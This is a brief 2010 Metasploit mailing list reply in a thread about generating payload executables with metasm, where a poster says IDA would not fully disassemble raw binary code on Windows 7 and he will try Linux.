Metasploit mailing list archives

Re: Dynamic creation of payload executables with metasm

From: John Biondolillo <johnb.electric () gmail com>
Date: Mon, 31 May 2010 05:50:20 -0400

I'm on my windows 7 box so i tried using ida but it doesn't like analyzing
raw binary code so it didn't convert all the opcodes into asm. I'll try it
on my linux box. Thanks

On Mon, May 31, 2010 at 2:23 AM, Eric <dkn4a1 () gmail com> wrote:

Well, i wud like to give an attempt to answer ur 1st question, not sure abt
the second one.

On Mon, May 31, 2010 at 12:03 AM, John Biondolillo <